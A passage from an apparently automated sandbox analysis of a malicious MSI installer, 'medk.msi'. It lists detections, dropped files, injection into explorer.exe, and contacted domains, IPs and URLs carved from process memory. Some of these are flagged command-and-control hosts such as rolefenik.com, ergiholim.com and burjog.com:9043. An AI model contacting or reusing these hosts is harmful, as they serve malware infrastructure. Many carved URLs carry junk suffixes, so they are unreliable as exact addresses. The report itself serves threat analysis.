network (likely due to code injection or exploit) 16->49 51 Contains functionality to inject threads in other processes 16->51 53 Injects code into the Windows Explorer (explorer.exe) 16->53 55 5 other signatures 16->55 24 explorer.exe 54 1 16->24 injected signatures9 process10 dnsIp11 45 ergiholim.com 104.21.15.162, 443, 49989, 49991 CLOUDFLARENETUS United States 24->45 47 rolefenik.com 104.21.92.105, 443, 49988, 49990 CLOUDFLARENETUS United States 24->47

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            medk.msi3%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\tab.dll3%ReversingLabs
            C:\Windows\Installer\MSI8D3A.tmp0%ReversingLabs
            C:\Windows\Installer\MSI8D89.tmp0%ReversingLabs
            C:\Windows\Installer\MSI8DD8.tmp0%ReversingLabs
            C:\Windows\Installer\MSI8E17.tmp0%ReversingLabs
            C:\Windows\Installer\MSI8F42.tmp0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://burjog.com:9043/neo.phptJZa0%Avira URL Cloudsafe
            https://rolefenik.com/test/g100%Avira URL Cloudmalware
            https://rolefenik.com/test/~100%Avira URL Cloudmalware
            https://burjog.com:9043/matrix.php~0%Avira URL Cloudsafe
            https://samomol.com/0%Avira URL Cloudsafe
            https://ergiholim.com/S100%Avira URL Cloudmalware
            http://r11.i.lencr0%Avira URL Cloudsafe
            https://burjog.com:9043/matrix.phpdOga0%Avira URL Cloudsafe
            https://rolefenik.com/100%Avira URL Cloudmalware
            https://samomol.com:9043/0%Avira URL Cloudsafe
            https://samomol.com:9043/pankihoy.php8O;a0%Avira URL Cloudsafe
            https://samomol.com:9043/pankihoy.phpd0%Avira URL Cloudsafe
            https://ergiholim.com/test/c100%Avira URL Cloudmalware
            https://burjog.com:9043/matrix.phpN0%Avira URL Cloudsafe
            https://ergiholim.com/test/g100%Avira URL Cloudmalware
            https://ergiholim.com/test/_100%Avira URL Cloudmalware
            https://ergiholim.com/test/bleSyncOnActivityFeed100%Avira URL Cloudmalware
            https://samomol.com:9043/pankihoy.php320%Avira URL Cloudsafe
            https://samomol.com/0P4a0%Avira URL Cloudsafe
            https://burjog.com:9043/neo.php0%Avira URL Cloudsafe
            https://rolefenik.com/X100%Avira URL Cloudmalware
            https://ergiholim.com/100%Avira URL Cloudmalware
            https://ergiholim.com/test/p100%Avira URL Cloudmalware
            https://rolefenik.com/c100%Avira URL Cloudmalware
            https://samomol.com:9043/pankihoy.phpaOda0%Avira URL Cloudsafe
            https://samomol.com:9043/pankihoy.php0%Avira URL Cloudsafe
            https://burjog.com:9043/matrix.phpwOva0%Avira URL Cloudsafe
            https://burjog.com:9043/pankihoy.php0%Avira URL Cloudsafe
            https://rolefenik.com/test/100%Avira URL Cloudmalware
            https://burjog.com:9043/matrix.php0%Avira URL Cloudsafe
            https://burjog.com:9043/neo.phpAHJ0%Avira URL Cloudsafe
            https://rolefenik.com/test/K100%Avira URL Cloudmalware
            https://burjog.com:9043/der0%Avira URL Cloudsafe
            https://burjog.com:9043/pankihoy.phpCryptographyQJga0%Avira URL Cloudsafe
            https://rolefenik.com/test/3100%Avira URL Cloudmalware
            https://burjog.com:9043/0%Avira URL Cloudsafe
            https://burjog.com/0%Avira URL Cloudsafe
            https://rolefenik.com/test/;100%Avira URL Cloudmalware
            https://burjog.com:9043/neo.phpjJ0%Avira URL Cloudsafe
            https://ergiholim.com/test/100%Avira URL Cloudmalware
            https://rolefenik.com/est/100%Avira URL Cloudmalware
            https://rolefenik.com/K100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            samomol.com
            		87.120.37.120
            		truetrue
              		unknown
              ergiholim.com
              		104.21.15.162
              		truetrue
                		unknown
                rolefenik.com
                		104.21.92.105
                		truefalse
                  		high
                  burjog.com
                  		45.143.166.230
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://rolefenik.com/test/true
                    • Avira URL Cloud: malware
                    		unknown
                    https://ergiholim.com/test/true
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://api.msn.com/Iexplorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://burjog.com:9043/matrix.phpdOgarundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://rolefenik.com/test/gexplorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://samomol.com/rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://word.office.comMexplorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://r11.i.lencrrundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://burjog.com:9043/matrix.php~rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.microexplorer.exe, 00000008.00000002.4567822986.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2236079810.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.4578819084.0000000007B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    https://ergiholim.com/Sexplorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://burjog.com:9043/neo.phptJZarundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://samomol.com:9043/rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://rolefenik.com/test/~explorer.exe, 00000008.00000002.4590045694.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://rolefenik.com/explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://ergiholim.com/test/bleSyncOnActivityFeedexplorer.exe, 00000008.00000003.3080227376.00000000032B1000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://x1.c.lencr.org/0rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311ABF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://x1.i.lencr.org/0rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311ABF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://samomol.com:9043/pankihoy.php8O;arundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://burjog.com:9043/neo.phprundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ergiholim.com/test/gexplorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://samomol.com:9043/pankihoy.php32rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://wns.windows.com/eexplorer.exe, 00000008.00000000.2238643975.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075025138.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980638609.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ergiholim.com/test/_explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://samomol.com:9043/pankihoy.phpdrundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ergiholim.com/test/cexplorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://burjog.com:9043/matrix.phpNrundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://r11.o.lencr.org0#rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://samomol.com/0P4arundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://samomol.com:9043/pankihoy.phpaOdarundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://rolefenik.com/Xexplorer.exe, 00000008.00000003.3080227376.00000000032B1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ergiholim.com/test/pexplorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ergiholim.com/explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://excel.office.com-explorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://burjog.com:9043/matrix.phprundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://burjog.com:9043/pankihoy.phprundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://rolefenik.com/cexplorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://burjog.com:9043/matrix.phpwOvarundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://r11.i.lencr.org/0rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 